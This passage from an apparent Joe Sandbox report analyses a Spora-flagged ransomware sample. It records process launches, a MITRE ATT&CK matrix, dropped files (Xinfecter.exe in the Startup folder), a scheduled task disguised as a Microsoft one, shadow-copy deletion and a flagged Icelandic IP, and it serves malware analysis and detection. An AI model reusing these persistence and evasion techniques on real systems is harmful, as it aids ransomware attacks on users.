        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008D45A0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,1_2_008D45A0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008D45A0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,1_2_008D45A0
        Source: Xinfecter.exe, 0000002A.00000002.2363142153.000000000093F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerwClass.0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00941905 cpuid 1_2_00941905
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: ___crtGetLocaleInfoEx,1_2_0093C838
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetLocaleInfoW,1_2_0093CB44
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_0097ED0A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: EnumSystemLocalesW,1_2_0097EF82
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: EnumSystemLocalesW,1_2_0097EFCD
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_0097F0F5
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: EnumSystemLocalesW,1_2_0097F068
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetLocaleInfoW,1_2_0097F345
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: EnumSystemLocalesW,1_2_00973430
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_0097F46E
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetLocaleInfoW,1_2_0097F575
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_0097F642
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: GetLocaleInfoW,1_2_00973919
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: ___crtGetLocaleInfoEx,42_2_0029C838
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_0029CB44
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,42_2_002DED0A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_002DEF82
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_002DEFCD
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_002DF068
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,42_2_002DF0F5
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_002DF345
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,42_2_002D3430
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,42_2_002DF46E
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_002DF575
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,42_2_002DF642
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,42_2_002D3919
        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009423EB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_009423EB
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C3EB0 GetUserNameW,1_2_008C3EB0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0097BC62 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0097BC62
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00946FA3 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,1_2_00946FA3
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00952887 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,1_2_00952887
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008B1020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,1_2_008B1020
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008B12E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,1_2_008B12E0
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0095357D Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,1_2_0095357D
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002B2887 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,42_2_002B2887
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00211020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,42_2_00211020
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002112E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,42_2_002112E0
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002B357D Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,42_2_002B357D

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information12
        Scripting        		1
        Replication Through Removable Media        		231
        Windows Management Instrumentation        		12
        Scripting        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		OS Credential Dumping2
        System Time Discovery        		Remote Services1
        Archive Collected Data        		2
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		1
        DLL Side-Loading        		11
        Windows Service        		2
        Obfuscated Files or Information        		LSASS Memory11
        Peripheral Device Discovery        		Remote Desktop ProtocolData from Removable Media2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Scheduled Task/Job        		11
        Windows Service        		12
        Process Injection        		1
        DLL Side-Loading        		Security Account Manager1
        Account Discovery        		SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Service Execution        		1
        Scheduled Task/Job        		1
        Scheduled Task/Job        		1
        File Deletion        		NTDS3
        File and Directory Discovery        		Distributed Component Object ModelInput Capture2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchd12
        Registry Run Keys / Startup Folder        		12
        Registry Run Keys / Startup Folder        		11
        Masquerading        		LSA Secrets58
        System Information Discovery        		SSHKeylogging2
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts13
        Virtualization/Sandbox Evasion        		Cached Domain Credentials1
        Network Share Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
        Process Injection        		DCSync241
        Security Software Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Indicator Removal        		Proc Filesystem13
        Virtualization/Sandbox Evasion        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow3
        Process Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Owner/User Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
        System Network Configuration Discovery        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569976 Sample: 8AbMCL2dxM.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 86 api.ipify.org 2->86 92 Suricata IDS alerts for network traffic 2->92 94 Antivirus detection for dropped file 2->94 96 Antivirus / Scanner detection for submitted sample 2->96 98 15 other signatures 2->98 10 8AbMCL2dxM.exe 22 2->10         started        15 cmd.exe 2 2->15         started        17 Xinfecter.exe 2->17         started        signatures3 process4 dnsIp5 88 185.147.34.53, 3586, 49742 HOSTSLIM-GLOBAL-NETWORKNL Iceland 10->88 90 api.ipify.org 104.26.12.205, 49736, 80 CLOUDFLARENETUS United States 10->90 78 C:\Users\user\AppData\...\Xinfecter.exe, PE32 10->78 dropped 80 C:\Windows\SysMain.sys, ASCII 10->80 dropped 82 C:\Users\user\AppData\S-8459.vbs, ASCII 10->82 dropped 84 4 other malicious files 10->84 dropped 118 Deletes shadow drive data (may be related to ransomware) 10->118 120 Drops PE files to the startup folder 10->120 122 Sample is not signed and drops a device driver 10->122 124 Contains functionality to clear event logs 10->124 19 cmd.exe 1 10->19         started        22 cmd.exe 3 2 10->22         started        24 cmd.exe 1 10->24         started        32 9 other processes 10->32 26 wscript.exe 15->26         started        28 conhost.exe 15->28         started        30 conhost.exe 17->30         started        file6 signatures7 process8 signatures9 100 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->100 102 Uses schtasks.exe or at.exe to add and modify task schedules 19->102 104 Writes or reads registry keys via WMI 19->104 34 tasklist.exe 1 19->34         started        36 findstr.exe 1 19->36         started        38 wscript.exe 1 22->38         started        41 systeminfo.exe 2 1 24->41         started        43 find.exe 1 24->43         started        106 Windows Scripting host queries suspicious COM object (likely to drop second stage) 26->106 45 cmd.exe 26->45         started        47 cmd.exe 26->47         started        49 schtasks.exe 1 32->49         started        51 5 other processes 32->51 process10 signatures11 108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 38->108 53 cmd.exe 1 38->53         started        55 cmd.exe 1 38->55         started        110 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 41->110 112 Writes or reads registry keys via WMI 41->112 57 WmiPrvSE.exe 41->57         started        59 tasklist.exe 45->59         started        62 conhost.exe 45->62         started        64 find.exe 45->64         started        66 conhost.exe 47->66         started        process12 signatures13 68 tasklist.exe 1 53->68         started        70 conhost.exe 53->70         started        72 find.exe 1 53->72         started        76 18 other processes 53->76 74 conhost.exe 55->74         started        114 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 59->114 116 Writes or reads registry keys via WMI 59->116 process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        8AbMCL2dxM.exe76%ReversingLabsWin32.Ransomware.Spora
        8AbMCL2dxM.exe100%AviraHEUR/AGEN.1353205
        8AbMCL2dxM.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe100%AviraHEUR/AGEN.1353205
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe76%ReversingLabsWin32.Ransomware.Spora

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.ipify.org
        		104.26.12.205
        		truefalse
          		high
          s-part-0035.t-0009.t-msedge.net
          		13.107.246.63
          		truefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://api.ipify.org/8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 8AbMCL2dxM.exe, 00000001.00000002.3512126954.0000000000AE9000.00000004.00000010.00020000.00000000.sdmpfalse
              		high
              http://api.ipify.org/ows8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://api.ipify.orgd8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://www.kraken.com/learn/buy-bitcoin-btc8AbMCL2dxM.exe, Xinfecter.exe.1.drfalse
                    		high
                    https://www.coinbase.com/how-to-buy/bitcoin8AbMCL2dxM.exe, Xinfecter.exe.1.drfalse
                      		high
                      http://api.ipify.org8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        104.26.12.205
                        		api.ipify.orgUnited States
                        		13335CLOUDFLARENETUSfalse
                        185.147.34.53
                        		unknownIceland
                        		207083HOSTSLIM-GLOBAL-NETWORKNLtrue

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1569976
                        Start date and time:2024-12-06 13:38:13 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:63
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:8AbMCL2dxM.exe
                        renamed because original name is a hash value
                        Original Sample Name:2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.adwa.evad.winEXE@119/22@1/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 46
                        • Number of non-executed functions: 213
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.85.23.206
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: 8AbMCL2dxM.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        13:39:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                        13:39:21Task SchedulerRun new task: Microsoft_Auto_Scheduler path: "C:\Users\user\AppData\S-2153.bat"

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.26.12.205Simple2.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                        • api.ipify.org/
                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                        • api.ipify.org/
                        perfcc.elfGet hashmaliciousXmrigBrowse
                        • api.ipify.org/
                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                        • api.ipify.org/
                        SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                        • api.ipify.org/
                        hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                        • api.ipify.org/
                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                        • api.ipify.org/
                        file.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        185.147.34.53Help.File@zohomail.eu_Fast.exeGet hashmaliciousTrojanRansomBrowse
                          Xinfecter.exeGet hashmaliciousTrojanRansomBrowse
                            Ross.dec1966@gmail.com_Fast.bin.exeGet hashmaliciousBabuk, Chaos, Conti, RegretLocker, TrojanRansomBrowse
                              12.exe1Get hashmaliciousBTC, Conti, Neshta, RegretLocker, TrojanRansomBrowse
                                DttL6H1DqQ.exeGet hashmaliciousBabuk, Chaos, ContiBrowse
                                  PAvH6odjUO.exeGet hashmaliciousVoidcryptBrowse

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    api.ipify.orgSimple1.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    Simple1.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    Simple2.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    Simple2.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
                                    • 172.67.74.152
                                    https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                    • 104.26.13.205
                                    s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.63
                                    https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.auGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.63
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.63
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.63
                                    MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    5Xt3byH0Pj.exeGet hashmaliciousXenoRATBrowse
                                    • 13.107.246.63
                                    1733477410159edf9b85a179e6cba033f8cb2d5a86e8ca4544f9e9f23b783f46e15a7ae1a2802.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                    • 13.107.246.63
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.63
                                    2E7y4M3fki.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    Rubik_v3.3.1.xlsmGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.63

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    HOSTSLIM-GLOBAL-NETWORKNLla.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                    • 213.166.86.57
                                    cenSXPimaG.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 213.166.86.22
                                    SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    REMITTANCE SLIP.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    PAYMENT SWIFT.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    PAYMENT RECEIPT.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    hsbc Wire copy.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    bin.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    CxmpudkF8Y.exeGet hashmaliciousRedLineBrowse
                                    • 185.147.34.93
                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.16.9
                                    https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.auGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.25.148
                                    https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.85.204
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                    • 104.18.69.40
                                    Simple1.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    Pr9cqW75nY.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.10.207
                                    G3vWD786PN.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.11.207
                                    hTXtTJXdLt.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.11.207
                                    fqufh5EOJr.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.11.207

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FRZJ9CRU.txt

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:modified
                                    Size (bytes):12
                                    Entropy (8bit):2.6258145836939115
                                    Encrypted:false
                                    SSDEEP:3:fuM9:2I
                                    MD5:E4A5E3AE7A904A86A50AE5FC1A38F374
                                    SHA1:0B536BF59DE491CCC2CAA8AE52200CD6B61364E9
                                    SHA-256:4EF53CF7C95DBE1BE9AC5E3D7465B91B911FD5C198EB161A55AF5579D9390C1A
                                    SHA-512:17D3508E7E847B91E84A06BA32BAD9A6CEC55373EE877E1163AB74EF4E18A72C38DD43897BE21E26556CBDE58DF9446E06B59B2BB37CC0321B5228D57C80A146
                                    Malicious:false
                                    Preview:8.46.123.228

                                    C:\Users\user\AppData\N-Save.sys

                                    Download File
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with very long lines (3460), with no line terminators
                                    Category:dropped
                                    Size (bytes):3460
                                    Entropy (8bit):6.011339466446963
                                    Encrypted:false
                                    SSDEEP:96:Sgw1uaPQAgu6e0fbQtSiF9vy6bmCRjWwLjRsx:Sgw0AB6eKi7bmcBjux
                                    MD5:CBBA7EFF5DED1DC813997EB60015A830
                                    SHA1:2F3318FF0521E300526F080757094752C343AD0C
                                    SHA-256:D5A7580E5392ED704446519DE794D97238868AFEF491BD9BCD590F8DE0299394
                                    SHA-512:A461EF955732552E2A28B9B3517E981AE1462353AB38D6AD33394B20F6C88845625890D244281820E98091218D92A9483DF95744682B99B30985C56481865235
                                    Malicious:true
